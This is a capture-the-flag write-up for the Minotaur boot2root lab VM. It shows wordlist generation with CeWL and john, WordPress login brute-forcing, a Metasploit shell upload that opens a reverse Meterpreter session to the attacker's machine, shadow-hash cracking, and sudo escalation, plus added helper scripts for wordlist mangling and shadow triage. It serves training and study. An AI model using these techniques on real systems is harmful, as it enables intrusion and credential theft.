published on in writeup
tags: sectalks

BNE0x00 - Minotaur

Minotaur CTF

Minotaur is a boot2root CTF. There are a few flag.txt files around to grab. /root/flag.txt is your ultimate goal.

Hints

  • This CTF has a couple of fairly heavy password cracking challenges, and some red herrings.
  • One password you will need is not on rockyou.txt or any other wordlist you may have out there. So you need to think of a way to generate it yourself.

Enumeration

After spinning up the VM and doing an ARP scan, we find it at 192.168.56.223. A port scan shows 3 ports available:

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 ed:74:0c:c9:21:c4:58:47:d4:02:89:c7:e5:3e:09:18 (DSA)
|   2048 0c:4b:a8:24:7e:fc:cd:8a:b1:9f:87:dd:9d:06:30:05 (RSA)
|_  256 40:9b:fe:f9:82:41:17:93:a2:96:34:25:1c:53:bb:ae (ECDSA)
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
2020/tcp open  ftp     vsftpd 2.0.8 or later
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)

The anonymous FTP share is empty, and the Apache page is the stock default with no custom comments or changes, so directory brute-forcing is the next logical step.

[email protected]:~# wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/big.txt --sc 200 http://192.168.56.223/FUZZ/
********************************************************
* Wfuzz 2.1.3 - The Web Bruteforcer                      *
********************************************************

Target: http://192.168.56.223/FUZZ/
Total requests: 3036

==================================================================
ID	Response   Lines      Word         Chars          Request    
==================================================================

00477:  C=200    321 L	     862 W	  16057 Ch	  "bull"

Here, we find a ‘Bull Blog’, powered by Wordpress.

Wordpress

wpscan is my defacto tool for scanning Wordpress.

[email protected]:~# wpscan -u http://192.168.56.223/bull/

This spits out 12 potential vulnerabilities, most of them being XSS. The most promising looking one is a Slideshow Gallery < 1.4.7 Arbitrary File Upload. However, we do need some valid credentials to do this. wpscan can enumerate users for us, which is half the battle.

    +----+-------+-------+
    | Id | Login | Name  |
    +----+-------+-------+
    | 1  | bully | bully |
    +----+-------+-------+

Now, this is where that second hint comes into play - a password we aren’t likely to find in an existing wordlist. I generated my own password list using CeWL and john - a technique I learnt way back in Hell.

[email protected]:~/minotaur# cewl -m 5 -w bulls http://192.168.56.223/bull/
[email protected]:~/minotaur# wc -l bulls 
315 bulls
[email protected]:~/minotaur# john --wordlist=bulls --rules --stdout >> bulls 
[email protected]:~/minotaur# wc -l bulls 
14590 bulls

That’s a lot of bulls :)
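As an added example (not part of the original writeup, and not john's actual rule set), here is a minimal awk-based rule engine that expands a CeWL-style base list the way `john --rules --stdout` does: case variants, appended digits and years, and a couple of common suffixes. The base words are constructed stand-ins for the CeWL output; it shows why a site-specific word such as `bighornedbulls` turns into the candidate `Bighornedbulls` that no public wordlist contains.

```shell
#!/bin/sh
# Added example, not from the original writeup: a small awk "rule engine"
# that expands a CeWL-style base list roughly the way `john --rules --stdout`
# does (case variants, appended digits/years, common suffixes). The input
# words below are constructed sample data standing in for CeWL's output.

mangle() {
  # stdin: one base word per line; stdout: deduplicated candidates
  awk 'NF {
    lower = tolower($1)
    cap   = toupper(substr(lower, 1, 1)) substr(lower, 2)
    upper = toupper(lower)
    print lower; print cap; print upper                            # case rules
    for (d = 0; d <= 9; d++) { print lower d; print cap d }        # append a digit
    for (y = 2013; y <= 2016; y++) { print lower y; print cap y }  # append a year
    print cap "!"; print lower "123"                               # common suffixes
  }' | sort -u
}

# Constructed stand-in for what CeWL scraped from the Bull Blog.
sample_words() {
  printf '%s\n' bull bighornedbulls Minotaur ''
}

# Number of distinct candidates the sample list expands to.
candidate_count() {
  sample_words | mangle | wc -l | tr -d ' '
}

# Exit 0 if the expanded list contains the given candidate, 1 otherwise.
has_candidate() {
  sample_words | mangle | grep -qx -- "$1"
}

# Stand-alone use: write the list for wpscan/hydra.
# sample_words | mangle > bulls-rules
```

Write the expanded list to a new file rather than appending to the file john is reading, and keep the `sort -u`: every duplicate is a wasted login attempt against the target, and the wpscan progress counter is counting exactly those lines.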

wpscan can also bruteforce the password for us, which is nice as we don’t have to screw around with hydra or medusa.

[email protected]:~/minotaur# wpscan -u http://192.168.56.223/bull/ -w /root/minotaur/bulls --username bully --threads 50

[+] Starting the password brute forcer
  Brute Forcing 'bully' Time: 00:03:32 <=======================================================================        > (13331 / 14591) 91.36%  ETA: 00:00:20
  [+] [SUCCESS] Login : bully Password : Bighornedbulls

I manually logged in just to make sure they worked, and I also noted that this was an admin account (which was fairly predictable due to its ID). But it does mean that we don’t actually need to exploit the Slideshow Gallery vulnerability, as we can just upload a PHP Shell via this admin panel.

Shell

I’ll just use the exploit/unix/webapp/wp_admin_shell_upload Metasploit module for this.

msf exploit(wp_admin_shell_upload) > exploit 

[*] Started reverse TCP handler on 192.168.56.101:4444 
[*] Authenticating with WordPress using bully:Bighornedbulls...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /bull/wp-content/plugins/JthxXkaTsb/zQvuEhlHdT.php...
[*] Sending stage (33684 bytes) to 192.168.56.223
[*] Meterpreter session 1 opened (192.168.56.101:4444 -> 192.168.56.223:53478) at 2016-04-15 17:08:46 +0100
[+] Deleted zQvuEhlHdT.php
[+] Deleted JthxXkaTsb.php

meterpreter > sysinfo 
Computer    : minotaur
OS          : Linux minotaur 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686
Meterpreter : php/php

Flag 1

The VM description told us that there are multiple flags, the first of which is found in the webroot.

meterpreter > cat /var/www/html/flag.txt
Oh, lookey here. A flag!
Th15 15 @N [email protected] [email protected]!

Flag 2

The second flag is found in the /tmp directory, along with a priv-esc opportunity.

meterpreter > ls /tmp

100640/rw-r-----  121   fil   2015-05-27 03:47:45 +0100  flag.txt
100640/rw-r-----  1148  fil   2015-05-27 07:47:30 +0100  shadow.bak

meterpreter > cat /tmp/flag.txt
That shadow.bak file is probably useful, hey?
Also, you found a flag!
My m1L|<$|-|@|<3 br1|\|G$ @11 t3h b0y$ 2 t3h [email protected]|)

root

meterpreter > download /tmp/shadow.bak
[*] downloading: /tmp/shadow.bak -> shadow.bak

I extracted the hashes for root, minotaur, heffer and h0rnbag and ran them through john. I got one hit pretty quickly: Password1 (heffer).
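Before feeding a copied shadow file to john it is worth a quick triage: which accounts actually carry a hash, which algorithm it is (so you can pass the right `--format`), and which of them are locked. The shell function below is an added example, not code from the writeup; the shadow lines it parses are constructed sample data with placeholder salts and digest bodies, and the algorithm shown for each user is invented for illustration, not taken from the VM's shadow.bak.

```shell
#!/bin/sh
# Added example, not from the original writeup: triage a copied shadow file
# before handing it to john. Prints only accounts that carry a crackable hash
# (skipping "*"/"!" entries with no hash), labels the hash type from its "$id$"
# prefix and emits user:hash lines in the format john expects.
# The shadow lines below are constructed sample data; salts and digest bodies
# are placeholders, not real hashes from the VM.

shadow_sample() {
  cat <<'EOF'
root:$6$saltroot$AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:16582:0:99999:7:::
daemon:*:16273:0:99999:7:::
sshd:!:16273:0:99999:7:::
minotaur:$6$saltmino$BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB:16582:0:99999:7:::
heffer:$1$saltheff$CCCCCCCCCCCCCCCCCCCCCC:16582:0:99999:7:::
h0rnbag:!$6$saltlock$DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD:16582:0:99999:7:::
EOF
}

# stdin: shadow lines; stdout: "user:hash:type[:locked]" for crackable entries
shadow_triage() {
  awk -F: '
    $2 == "" || $2 == "*" || $2 == "!" || $2 == "!!" { next }   # no hash at all
    {
      hash = $2; locked = ""
      if (substr(hash, 1, 1) == "!") {          # passwd -l prepends "!" but keeps the hash
        hash = substr(hash, 2); locked = ":locked"
      }
      split(hash, p, /\$/)                      # "$6$salt$digest" -> p[2] == "6"
      type = "unknown"
      if (p[2] == "1") type = "md5crypt"
      else if (p[2] == "5") type = "sha256crypt"
      else if (p[2] == "6") type = "sha512crypt"
      else if (p[2] == "y") type = "yescrypt"
      print $1 ":" hash ":" type locked
    }'
}

# Number of entries worth feeding to john for the sample file.
crackable_count() {
  shadow_sample | shadow_triage | wc -l | tr -d ' '
}

# Hash type reported for a user (empty if the user is not crackable).
hash_type_of() {
  shadow_sample | shadow_triage | awk -F: -v u="$1" '$1 == u { print $3 }'
}

# Stand-alone use: write john input (user:hash) for the sample file.
# shadow_sample | shadow_triage | cut -d: -f1,2 > hashes.txt
```

The `!`-prefixed entry is the case people miss: `passwd -l` only prepends `!` and leaves the hash intact, so the password is still crackable (and often reused elsewhere) even though the account can't log in; john won't recognise the hash until that `!` is stripped.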

I was able to use these creds and login over SSH and retrieve his flag.

[email protected]:~/minotaur# ssh heffer@192.168.56.223

heffer@minotaur:~$ ls -l

-rw------- 1 heffer heffer 107 May 27  2015 flag.txt

heffer@minotaur:~$ cat flag.txt 
So this was an easy flag to get, hopefully. Have you gotten ~minotaur/flag.txt yet?
Th3 [email protected] 15: m00000 y0

heffer has a sudo entry, but it is a dead end: the rule allows /root/bullquote.sh, and that script doesn't exist (the listing of /root at the end shows only quotes.txt). Because sudo can't resolve the command, the NOPASSWD rule doesn't match, so it falls back to asking for a password and then reports the command missing. A rule like this is only exploitable if you can create the target path yourself, and a non-root user can't write to /root on a default Ubuntu install.

heffer@minotaur:~$ sudo -l

User heffer may run the following commands on minotaur:
    (root) NOPASSWD: /root/bullquote.sh

heffer@minotaur:~$ sudo /root/bullquote.sh
[sudo] password for heffer: 
sudo: /root/bullquote.sh: command not found

In the time I was poking around here, I got a second password from john: obiwan6 (minotaur). I did a quick su and collected minotaur’s flag.

heffer@minotaur:~$ su minotaur
Password: 
minotaur@minotaur:/home/heffer$ cd
minotaur@minotaur:~$ ls -l
-rw------- 1 minotaur minotaur  107 May 27  2015 flag.txt
drwxr-xr-x 4 minotaur minotaur 4096 May 27  2015 peda

minotaur@minotaur:~$ cat flag.txt 
Congrats! You've found the first flag:
M355 W17H T3H 8ULL, G37 73H H0RN!

But can you get /root/flag.txt ?

minotaur can run ALL as root (with a password, but we already cracked it), which makes elevation to root trivial.

minotaur@minotaur:~$ sudo -l

User minotaur may run the following commands on minotaur:
    (root) NOPASSWD: /root/bullquote.sh
    (ALL : ALL) ALL

minotaur@minotaur:~$ sudo -i
[sudo] password for minotaur: 
root@minotaur:~# 

Final Flag

root@minotaur:~# ls -l
-rw------- 1 root root   70 May 27  2015 flag.txt
drwxr-xr-x 4 root root 4096 May 27  2015 peda
-rwx------ 1 root root  845 May 15  2015 quotes.txt

root@minotaur:~# cat flag.txt 
Congrats! You got the final flag!
Th3 [email protected] is: 5urr0nd3d bY @r$3h0l35